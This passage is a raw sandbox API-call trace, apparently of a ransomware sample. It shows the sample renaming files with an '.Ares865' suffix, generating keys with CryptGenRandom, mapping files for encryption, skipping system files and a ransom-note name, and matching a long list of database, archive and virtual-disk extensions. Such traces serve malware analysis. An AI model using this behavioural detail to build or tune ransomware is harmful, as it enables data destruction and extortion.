lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0091.026] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0091.026] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0091.044] wsprintfA (in: param_1=0x2ccebc8, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\* FindFirstFile error 3\r\n") returned 292 [0091.044] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\* FindFirstFile error 3\r\n") returned 292 [0091.044] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.044] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5590 [0091.044] WriteFile (in: hFile=0x120, lpBuffer=0x2ccebc8*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2cce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ccebc8*, lpNumberOfBytesWritten=0x2cce0b4*=0x124, lpOverlapped=0x0) returned 1 [0091.045] CloseHandle (hObject=0x120) returned 1 [0091.045] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2368 [0091.066] wsprintfA (in: param_1=0x2ccebc8, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\* FindFirstFile error 3\r\n") returned 292 [0091.066] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\* FindFirstFile error 3\r\n") returned 292 [0091.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.066] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x56b4 [0091.066] WriteFile (in: hFile=0x120, lpBuffer=0x2ccebc8*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2cce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ccebc8*, lpNumberOfBytesWritten=0x2cce0b4*=0x124, lpOverlapped=0x0) returned 1 [0091.066] CloseHandle (hObject=0x120) returned 1 [0091.066] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0091.069] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.Ares865") returned 260 [0091.069] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.ares865"), dwFlags=0x1) returned 0 [0091.070] GetLastError () returned 0x3 [0091.070] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp MoveFileEx error 3\r\n") returned 281 [0091.070] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp MoveFileEx error 3\r\n") returned 281 [0091.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0091.070] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x57d8 [0091.070] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x119, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x119, lpOverlapped=0x0) returned 1 [0091.070] CloseHandle (hObject=0x118) returned 1 [0091.070] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0091.070] CloseHandle (hObject=0x0) returned 0 [0091.070] CloseHandle (hObject=0x0) returned 0 [0091.071] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0xb4450880, ftLastWriteTime.dwHighDateTime=0x1cf6c45, nFileSizeHigh=0x0, nFileSizeLow=0x10e3000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdbeRdrUpd10110_MUI.msp", cAlternateFileName="ADBERD~1.MSP")) returned 1 [0091.071] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.071] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="aoldtz.exe") returned -1 [0091.072] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.Ares865") returned 243 [0091.072] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.ares865"), dwFlags=0x1) returned 1 [0091.073] CreateFileW (lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.074] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=251904) returned 1 [0091.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.074] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.075] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.075] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.075] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3db00, lpName=0x0) returned 0x15c [0091.077] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3db00) returned 0x420000 [0091.094] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.095] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.095] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0091.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31b0d0 [0091.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0091.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31b0d0 | out: hHeap=0x2b0000) returned 1 [0091.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0091.095] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0091.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0091.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0091.095] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0091.095] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0091.098] CloseHandle (hObject=0x15c) returned 1 [0091.098] CloseHandle (hObject=0x118) returned 1 [0091.098] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0091.098] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0091.098] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0091.099] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0xb4450880, ftLastWriteTime.dwHighDateTime=0x1cf6c45, nFileSizeHigh=0x0, nFileSizeLow=0x10e3000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdbeRdrUpd10110_MUI.msp", cAlternateFileName="ADBERD~1.MSP")) returned 1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="aoldtz.exe") returned -1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2=".") returned 1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="..") returned 1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="windows") returned -1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="bootmgr") returned -1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="temp") returned -1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="pagefile.sys") returned -1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="boot") returned -1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="ids.txt") returned -1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="ntuser.dat") returned -1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="perflogs") returned -1 [0091.099] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2="MSBuild") returned -1 [0091.099] lstrlenW (lpString="AdbeRdrUpd10110_MUI.msp") returned 23 [0091.099] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp") returned 235 [0091.099] lstrcpyW (in: lpString1=0x2cce5aa, lpString2="AdbeRdrUpd10110_MUI.msp" | out: lpString1="AdbeRdrUpd10110_MUI.msp") returned="AdbeRdrUpd10110_MUI.msp" [0091.099] lstrlenW (lpString="AdbeRdrUpd10110_MUI.msp") returned 23 [0091.099] lstrlenW (lpString="Ares865") returned 7 [0091.099] lstrcmpiW (lpString1="MUI.msp", lpString2="Ares865") returned 1 [0091.099] lstrlenW (lpString=".dll") returned 4 [0091.100] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2=".dll") returned 1 [0091.100] lstrlenW (lpString=".lnk") returned 4 [0091.100] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2=".lnk") returned 1 [0091.100] lstrlenW (lpString=".ini") returned 4 [0091.100] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2=".ini") returned 1 [0091.100] lstrlenW (lpString=".sys") returned 4 [0091.100] lstrcmpiW (lpString1="AdbeRdrUpd10110_MUI.msp", lpString2=".sys") returned 1 [0091.100] lstrlenW (lpString="AdbeRdrUpd10110_MUI.msp") returned 23 [0091.100] lstrlenW (lpString="bak") returned 3 [0091.100] lstrcmpiW (lpString1="msp", lpString2="bak") returned 1 [0091.100] lstrlenW (lpString="ba_") returned 3 [0091.100] lstrcmpiW (lpString1="msp", lpString2="ba_") returned 1 [0091.100] lstrlenW (lpString="dbb") returned 3 [0091.100] lstrcmpiW (lpString1="msp", lpString2="dbb") returned 1 [0091.100] lstrlenW (lpString="vmdk") returned 4 [0091.100] lstrcmpiW (lpString1=".msp", lpString2="vmdk") returned -1 [0091.100] lstrlenW (lpString="rar") returned 3 [0091.100] lstrcmpiW (lpString1="msp", lpString2="rar") returned -1 [0091.100] lstrlenW (lpString="zip") returned 3 [0091.100] lstrcmpiW (lpString1="msp", lpString2="zip") returned -1 [0091.100] lstrlenW (lpString="tgz") returned 3 [0091.100] lstrcmpiW (lpString1="msp", lpString2="tgz") returned -1 [0091.100] lstrlenW (lpString="vbox") returned 4 [0091.100] lstrcmpiW (lpString1=".msp", lpString2="vbox") returned -1 [0091.100] lstrlenW (lpString="vdi") returned 3 [0091.100] lstrcmpiW (lpString1="msp", lpString2="vdi") returned -1 [0091.100] lstrlenW (lpString="vhd") returned 3 [0091.100] lstrcmpiW (lpString1="msp", lpString2="vhd") returned -1 [0091.100] lstrlenW (lpString="vhdx") returned 4 [0091.100] lstrcmpiW (lpString1=".msp", lpString2="vhdx") returned -1 [0091.100] lstrlenW (lpString="avhd") returned 4 [0091.100] lstrcmpiW (lpString1=".msp", lpString2="avhd") returned -1 [0091.100] lstrlenW (lpString="db") returned 2 [0091.100] lstrcmpiW (lpString1="sp", lpString2="db") returned 1 [0091.100] lstrlenW (lpString="db2") returned 3 [0091.100] lstrcmpiW (lpString1="msp", lpString2="db2") returned 1 [0091.100] lstrlenW (lpString="db3") returned 3 [0091.100] lstrcmpiW (lpString1="msp", lpString2="db3") returned 1 [0091.101] lstrlenW (lpString="dbf") returned 3 [0091.101] lstrcmpiW (lpString1="msp", lpString2="dbf") returned 1 [0091.101] lstrlenW (lpString="mdf") returned 3 [0091.101] lstrcmpiW (lpString1="msp", lpString2="mdf") returned 1 [0091.101] lstrlenW (lpString="mdb") returned 3 [0091.101] lstrcmpiW (lpString1="msp", lpString2="mdb") returned 1 [0091.101] lstrlenW (lpString="sql") returned 3 [0091.101] lstrcmpiW (lpString1="msp", lpString2="sql") returned -1 [0091.101] lstrlenW (lpString="sqlite") returned 6 [0091.101] lstrcmpiW (lpString1="UI.msp", lpString2="sqlite") returned 1 [0091.101] lstrlenW (lpString="sqlite3") returned 7 [0091.101] lstrcmpiW (lpString1="MUI.msp", lpString2="sqlite3") returned -1 [0091.101] lstrlenW (lpString="sqlitedb") returned 8 [0091.101] lstrcmpiW (lpString1="_MUI.msp", lpString2="sqlitedb") returned -1 [0091.101] lstrlenW (lpString="xml") returned 3 [0091.101] lstrcmpiW (lpString1="msp", lpString2="xml") returned -1 [0091.101] lstrlenW (lpString="$er") returned 3 [0091.101] lstrcmpiW (lpString1="msp", lpString2="$er") returned 1 [0091.101] lstrlenW (lpString="4dd") returned 3 [0091.101] lstrcmpiW (lpString1="msp", lpString2="4dd") returned 1 [0091.101] lstrlenW (lpString="4dl") returned 3 [0091.101] lstrcmpiW (lpString1="msp", lpString2="4dl") returned 1 [0091.101] lstrlenW (lpString="^^^") returned 3 [0091.101] lstrcmpiW (lpString1="msp", lpString2="^^^") returned 1 [0091.101] lstrlenW (lpString="abs") returned 3 [0091.101] lstrcmpiW (lpString1="msp", lpString2="abs") returned 1 [0091.101] lstrlenW (lpString="abx") returned 3 [0091.101] lstrcmpiW (lpString1="msp", lpString2="abx") returned 1 [0091.101] lstrlenW (lpString="accdb") returned 5 [0091.101] lstrcmpiW (lpString1="I.msp", lpString2="accdb") returned 1 [0091.101] lstrlenW (lpString="accdc") returned 5 [0091.101] lstrcmpiW (lpString1="I.msp", lpString2="accdc") returned 1 [0091.101] lstrlenW (lpString="accde") returned 5 [0091.101] lstrcmpiW (lpString1="I.msp", lpString2="accde") returned 1 [0091.101] lstrlenW (lpString="accdr") returned 5 [0091.101] lstrcmpiW (lpString1="I.msp", lpString2="accdr") returned 1 [0091.101] lstrlenW (lpString="accdt") returned 5 [0091.101] lstrcmpiW (lpString1="I.msp", lpString2="accdt") returned 1 [0091.102] lstrlenW (lpString="accdw") returned 5 [0091.102] lstrcmpiW (lpString1="I.msp", lpString2="accdw") returned 1 [0091.102] lstrlenW (lpString="accft") returned 5 [0091.102] lstrcmpiW (lpString1="I.msp", lpString2="accft") returned 1 [0091.102] lstrlenW (lpString="adb") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="adb") returned 1 [0091.102] lstrlenW (lpString="adb") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="adb") returned 1 [0091.102] lstrlenW (lpString="ade") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="ade") returned 1 [0091.102] lstrlenW (lpString="adf") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="adf") returned 1 [0091.102] lstrlenW (lpString="adn") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="adn") returned 1 [0091.102] lstrlenW (lpString="adp") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="adp") returned 1 [0091.102] lstrlenW (lpString="alf") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="alf") returned 1 [0091.102] lstrlenW (lpString="ask") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="ask") returned 1 [0091.102] lstrlenW (lpString="btr") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="btr") returned 1 [0091.102] lstrlenW (lpString="cat") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="cat") returned 1 [0091.102] lstrlenW (lpString="cdb") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="cdb") returned 1 [0091.102] lstrlenW (lpString="ckp") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="ckp") returned 1 [0091.102] lstrlenW (lpString="cma") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="cma") returned 1 [0091.102] lstrlenW (lpString="cpd") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="cpd") returned 1 [0091.102] lstrlenW (lpString="dacpac") returned 6 [0091.102] lstrcmpiW (lpString1="UI.msp", lpString2="dacpac") returned 1 [0091.102] lstrlenW (lpString="dad") returned 3 [0091.102] lstrcmpiW (lpString1="msp", lpString2="dad") returned 1 [0091.102] lstrlenW (lpString="dadiagrams") returned 10 [0091.102] lstrcmpiW (lpString1="10_MUI.msp", lpString2="dadiagrams") returned -1 [0091.103] lstrlenW (lpString="daschema") returned 8 [0091.103] lstrcmpiW (lpString1="_MUI.msp", lpString2="daschema") returned -1 [0091.103] lstrlenW (lpString="db-journal") returned 10 [0091.103] lstrcmpiW (lpString1="10_MUI.msp", lpString2="db-journal") returned -1 [0091.103] lstrlenW (lpString="db-shm") returned 6 [0091.103] lstrcmpiW (lpString1="UI.msp", lpString2="db-shm") returned 1 [0091.103] lstrlenW (lpString="db-wal") returned 6 [0091.103] lstrcmpiW (lpString1="UI.msp", lpString2="db-wal") returned 1 [0091.103] lstrlenW (lpString="dbc") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dbc") returned 1 [0091.103] lstrlenW (lpString="dbs") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dbs") returned 1 [0091.103] lstrlenW (lpString="dbt") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dbt") returned 1 [0091.103] lstrlenW (lpString="dbv") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dbv") returned 1 [0091.103] lstrlenW (lpString="dbx") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dbx") returned 1 [0091.103] lstrlenW (lpString="dcb") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dcb") returned 1 [0091.103] lstrlenW (lpString="dct") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dct") returned 1 [0091.103] lstrlenW (lpString="dcx") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dcx") returned 1 [0091.103] lstrlenW (lpString="ddl") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="ddl") returned 1 [0091.103] lstrlenW (lpString="dlis") returned 4 [0091.103] lstrcmpiW (lpString1=".msp", lpString2="dlis") returned -1 [0091.103] lstrlenW (lpString="dp1") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dp1") returned 1 [0091.103] lstrlenW (lpString="dqy") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dqy") returned 1 [0091.103] lstrlenW (lpString="dsk") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dsk") returned 1 [0091.103] lstrlenW (lpString="dsn") returned 3 [0091.103] lstrcmpiW (lpString1="msp", lpString2="dsn") returned 1 [0091.103] lstrlenW (lpString="dtsx") returned 4 [0091.103] lstrcmpiW (lpString1=".msp", lpString2="dtsx") returned -1 [0091.104] lstrlenW (lpString="dxl") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="dxl") returned 1 [0091.104] lstrlenW (lpString="eco") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="eco") returned 1 [0091.104] lstrlenW (lpString="ecx") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="ecx") returned 1 [0091.104] lstrlenW (lpString="edb") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="edb") returned 1 [0091.104] lstrlenW (lpString="epim") returned 4 [0091.104] lstrcmpiW (lpString1=".msp", lpString2="epim") returned -1 [0091.104] lstrlenW (lpString="fcd") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="fcd") returned 1 [0091.104] lstrlenW (lpString="fdb") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="fdb") returned 1 [0091.104] lstrlenW (lpString="fic") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="fic") returned 1 [0091.104] lstrlenW (lpString="flexolibrary") returned 12 [0091.104] lstrcmpiW (lpString1="0110_MUI.msp", lpString2="flexolibrary") returned -1 [0091.104] lstrlenW (lpString="fm5") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="fm5") returned 1 [0091.104] lstrlenW (lpString="fmp") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="fmp") returned 1 [0091.104] lstrlenW (lpString="fmp12") returned 5 [0091.104] lstrcmpiW (lpString1="I.msp", lpString2="fmp12") returned 1 [0091.104] lstrlenW (lpString="fmpsl") returned 5 [0091.104] lstrcmpiW (lpString1="I.msp", lpString2="fmpsl") returned 1 [0091.104] lstrlenW (lpString="fol") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="fol") returned 1 [0091.104] lstrlenW (lpString="fp3") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="fp3") returned 1 [0091.104] lstrlenW (lpString="fp4") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="fp4") returned 1 [0091.104] lstrlenW (lpString="fp5") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="fp5") returned 1 [0091.104] lstrlenW (lpString="fp7") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="fp7") returned 1 [0091.104] lstrlenW (lpString="fpt") returned 3 [0091.104] lstrcmpiW (lpString1="msp", lpString2="fpt") returned 1 [0091.105] lstrlenW (lpString="frm") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="frm") returned 1 [0091.105] lstrlenW (lpString="gdb") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="gdb") returned 1 [0091.105] lstrlenW (lpString="gdb") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="gdb") returned 1 [0091.105] lstrlenW (lpString="grdb") returned 4 [0091.105] lstrcmpiW (lpString1=".msp", lpString2="grdb") returned -1 [0091.105] lstrlenW (lpString="gwi") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="gwi") returned 1 [0091.105] lstrlenW (lpString="hdb") returned 3 [0091.105] lstrcmpiW (lpString1="msp", lpString2="hdb") returned 1 